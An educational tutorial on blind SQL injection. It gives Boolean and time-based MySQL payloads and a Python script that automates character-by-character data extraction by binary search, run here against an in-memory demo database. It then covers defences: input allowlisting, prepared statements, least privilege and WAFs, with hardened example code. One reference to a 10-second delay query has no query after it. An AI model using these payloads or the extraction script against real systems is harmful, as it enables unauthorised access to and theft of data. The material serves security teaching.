In a Blind SQL injection the application returns no error message and no query output, which is what makes it blind. The attacker instead relies on how the server responds (a true/false difference in the page) or on how long it takes to respond, and that gives the two kinds of Blind SQL Injection: Boolean-based and Time-based.
In Boolean-based injection, the server's response differs depending on whether the injected condition evaluates to true or false. The attacker modifies the condition, observes which of the two responses comes back, and so reveals information about the database one yes/no answer at a time.
For example, as we saw in the Error-Based SQL injection section, the server responds with an “exists” or “not exists” message.
From the Error-Based injection we know that the name MARY exists in the database, so we modify our input to MARY' AND 1=1;--, which still generates the “exists” response because both halves of the AND are true.
Feeding MARY' AND 1=2;-- instead returns “not exists”: MARY does exist, but 1=2 is false, so the whole condition is false.
We can use the same method to find out the version of the database using the following query.
MARY' and substring(@@version,1,1)=1;--
If the first character of the database version string is 1, this generates the positive (“exists”) response; otherwise we try the other digits in turn. For the second character we use the following query.
MARY' and substring(@@version,2,1)=1;--
We can also find the name of the database. First we need to know the length of the name, which we can get from the following query.
MARY' and length(database())=1;--
We increment the trailing value until the server returns the positive response; that value is the length of the name.
To find out the characters of the database name, one position at a time, we can try the following query.
MARY' and substring(database(),1,1)='a';--
We replace the last character with each letter (and digit or underscore, since those are also valid in a database name) until we get a positive response.
Then we change the position argument after database() to test the next character, i.e.
MARY' and substring(database(),2,1)='a';--
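The version and database-name probes above are the same procedure: find the length, then recover the value one character at a time through the exists / not-exists oracle. The following added example (it is not code from the original article) automates that procedure and replaces the “try every letter” loop with a binary search on the character's code point, which needs about seven requests per character instead of up to thirty-six. It stands up a throwaway SQLite database in memory to play the part of the vulnerable application, so it runs offline; the users table, the MARY/JOHN rows and the function names are constructed for this demo. Because the engine is SQLite rather than MySQL, the probes use substr(), unicode() and sqlite_version() where the article's payloads use substring(), ascii() and @@version; the payload structure MARY' AND (...)-- is otherwise the article's.

```python
"""Boolean-based blind SQL injection, automated.

Added example, not from the original article. The in-memory SQLite database,
the users table and the oracle behaviour are constructed stand-ins for the
vulnerable application; sqlite_version() stands in for MySQL's @@version.
"""
import sqlite3

# Constructed target database (assumption for the demo).
_db = sqlite3.connect(":memory:")
_db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
_db.executemany("INSERT INTO users (name) VALUES (?)", [("MARY",), ("JOHN",)])
_db.commit()


def name_exists(user_input: str) -> bool:
    """The vulnerable endpoint: concatenates the input straight into the query
    and reveals only whether a row came back (the article's exists/not-exists)."""
    sql = f"SELECT id FROM users WHERE name = '{user_input}'"
    return _db.execute(sql).fetchone() is not None


def oracle(condition: str) -> bool:
    """Turn an arbitrary SQL condition into a yes/no answer.
    This is the article's  MARY' AND <condition>--  with MARY known to exist,
    so the answer depends only on <condition>."""
    return name_exists(f"MARY' AND ({condition})-- ")


def find_length(expr: str, max_len: int = 256) -> int:
    """Binary-search length(expr) instead of incrementing 1, 2, 3, ...
    Invariant: the true length lies in [lo, hi]; assumes it is <= max_len."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"length({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def find_char(expr: str, pos: int) -> str:
    """Binary-search the code point of the character at 1-based position pos.
    Assumes printable ASCII (0..127); MySQL would use ascii(substring(...))."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract(expr: str) -> str:
    """Recover the full value of any SQL expression through the oracle."""
    n = find_length(expr)
    return "".join(find_char(expr, i) for i in range(1, n + 1))


if __name__ == "__main__":
    print("MARY' AND 1=1-- :", oracle("1=1"))   # True  (exists)
    print("MARY' AND 1=2-- :", oracle("1=2"))   # False (not exists)
    print("version       :", extract("sqlite_version()"))
    print("first table   :", extract("(SELECT name FROM sqlite_master WHERE type='table')"))
    print("second user   :", extract("(SELECT name FROM users WHERE id = 2)"))
```

Against a real target, name_exists would be an HTTP request whose response is classified as “exists” or “not exists”; everything else stays the same. The only caveat worth remembering is that a flaky oracle (rate limiting, a cache, a WAF dropping some requests) corrupts a binary search silently, so in practice each answer is usually confirmed before moving to the next character.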
In Time-Based Blind SQL injection the attacker relies on how long the server takes to respond: the injected condition is tied to a delay function such as sleep(), so a true condition shows up as a slow response and a false one as a normal response, even when the page itself looks identical in both cases. For example, consider the following query.
The above input forces a 10-second delay in the response. We can expand on this concept with the following query.
MARY' and if((select+@@version) like "10%",sleep(2),null);--
If the response is delayed by two seconds, the version starts with “10”; if it comes back immediately, it does not. LIKE is a pattern-matching operator: in “10%” the % stands for any sequence of characters, so the pattern matches any version string that begins with “10”, and by moving a single character in front of the % the same trick recovers the value one character at a time. Allow for network jitter when picking the delay, since a slow but uninjected response is easily mistaken for a positive result.
Preventing SQL Injection:-
SQL injection has 2 root causes:
- Not validating the input before constructing the query.
- Including user input in building dynamic queries.
To address them we need to enforce input validation and use prepared statements, in combination with other protection measures.
1. Validating user-supplied input:-
There are 2 possible ways to validate user-supplied inputs.
- Blacklist the Input
- Whitelist the Input
For both methods we prepare a list: of characters that are forbidden (blacklist) or of the characters and patterns that are allowed (whitelist).
Blacklisting the input means rejecting any input that contains a character from the list, such as the quote, semicolon or comment sequence. Doing this only in client-side JS validation is not a protection at all, since the attacker can send the request without the browser; the check has to run on the server.
Whitelisting the input means accepting only input that matches the allowed list (for example, a name may consist only of letters) and rejecting everything else.
Of the two, whitelisting is preferable.
Blacklisting is not a recommended way to protect against SQL Injection because it is highly prone to failure: it works only as long as the developer has enumerated every special character and encoding the attacker could use, and the user input fields accept no special characters other than what is required.
2. Prepared Statements and Least Privilege:-
A prepared statement (parameterized query) fixes the SQL text in advance and passes the user's input to the database separately, as a bound parameter. The input is then treated strictly as data and can never change the structure of the query, which removes the second root cause above. On top of that, execute the queries as a database user who has the minimum rights needed. This softens the impact of an SQL injection attack: a user who only has the right to read the database will only be able to access the data, not alter or delete it, if the application is compromised.
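The three measures from points 1 and 2 (server-side whitelist validation, a prepared statement, and a database account that cannot write) are shown side by side with the vulnerable code in the added example below. It is not code from the original article: the in-memory SQLite database, the users table, the allowlist pattern and the function names are assumptions for the demo. SQLite has no user accounts, so least privilege is modelled with PRAGMA query_only, which makes the connection refuse every data change; on a real database server the equivalent is granting the web application's account SELECT only.

```python
"""Preventing SQL injection: vulnerable query beside the hardened version.

Added example, not from the original article. The database, table, allowlist
pattern and helper names are constructed for this demo.
"""
import re
import sqlite3

# Constructed stand-in for the application's database (assumption for the demo).
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
db.executemany("INSERT INTO users (name) VALUES (?)", [("MARY",), ("JOHN",)])
db.commit()

# The article's Boolean probe. It makes the vulnerable query say "exists";
# to the fixed query it is just a name that nobody has.
PAYLOAD = "MARY' AND 1=1-- "


def name_exists_vulnerable(user_input: str) -> bool:
    """Before: the input becomes part of the SQL text, so the quote in PAYLOAD
    closes the string literal and the rest is parsed as SQL."""
    sql = f"SELECT id FROM users WHERE name = '{user_input}'"
    return db.execute(sql).fetchone() is not None


def name_exists_safe(user_input: str) -> bool:
    """After: a prepared statement with a bound parameter. The SQL text is a
    constant; the driver hands the input to the engine as a value, so a quote
    inside it is only a character to compare against."""
    row = db.execute("SELECT id FROM users WHERE name = ?", (user_input,)).fetchone()
    return row is not None


# Whitelist validation: describe the only shape a name may take and reject
# everything else. This is a server-side defence-in-depth step in front of the
# prepared statement, not a replacement for it. Pattern chosen for the demo.
NAME_ALLOWLIST = re.compile(r"[A-Za-z]{1,64}")


def is_valid_name(user_input: str) -> bool:
    return NAME_ALLOWLIST.fullmatch(user_input) is not None


def lookup(user_input: str) -> bool:
    """Validate first, then query through the parameterized statement."""
    if not is_valid_name(user_input):
        raise ValueError("name contains characters outside the allowlist")
    return name_exists_safe(user_input)


# Least privilege: the read-only connection the lookup feature should run on.
# SQLite has no accounts, so PRAGMA query_only models a SELECT-only grant.
db.execute("PRAGMA query_only = ON")


def attempt_delete() -> bool:
    """Returns True if a DELETE went through; under least privilege it must not."""
    try:
        db.execute("DELETE FROM users")
        return True
    except sqlite3.OperationalError:  # "attempt to write a readonly database"
        return False


def row_count() -> int:
    return db.execute("SELECT COUNT(*) FROM users").fetchone()[0]


if __name__ == "__main__":
    print("vulnerable :", name_exists_vulnerable(PAYLOAD))  # True: injection worked
    print("prepared   :", name_exists_safe(PAYLOAD))        # False: no such name
    print("allowlist  :", is_valid_name("MARY"), is_valid_name(PAYLOAD))
    print("delete     :", attempt_delete(), "rows left:", row_count())
```

The order matters: validation rejects the payload before it reaches the database, the prepared statement would defeat it even if validation were missing or too loose (a name field that legitimately allows an apostrophe, for instance), and the read-only account bounds the damage if both of the first two fail somewhere else in the application.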
3. Additional layers of security:-
Solutions like a Web Application Firewall (WAF) can help as an extra layer of protection against SQL Injection attacks. A WAF inspects traffic at the application level and tries to decide whether a request is malicious before it reaches the application. It needs maintenance, since its signatures have to be kept up to date, and it should be treated as a supplement to the fixes above rather than a substitute: attackers routinely find encodings and payload variants that slip past a WAF's rules.